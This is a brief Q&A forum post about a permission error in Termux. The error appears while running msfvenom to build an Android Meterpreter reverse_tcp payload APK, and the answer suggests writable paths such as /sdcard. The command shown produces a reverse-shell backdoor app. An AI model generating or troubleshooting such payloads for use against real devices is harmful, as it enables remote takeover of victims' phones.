# A problem to Creating metasploit payload in termux

Tags: termux

```
msfvenom -p android/meterpreter/reverse_tcp LHOST= ip
LPORT=4444 R > /storage/hackmingtest.apk
```

> bash: /storage/hackmingtest.apk: Permission denied

I use this command also (termux-setup-storage)
But it is not working

Answer (score 0):

The Solution' to this Question is very simple ..
The `/storage` directory requires root access. I think the Location you wanna enter is `/storage/emulated/0/something.apk`

ALTERNATIVELY, you can also use `/sdcard/whatever.apk`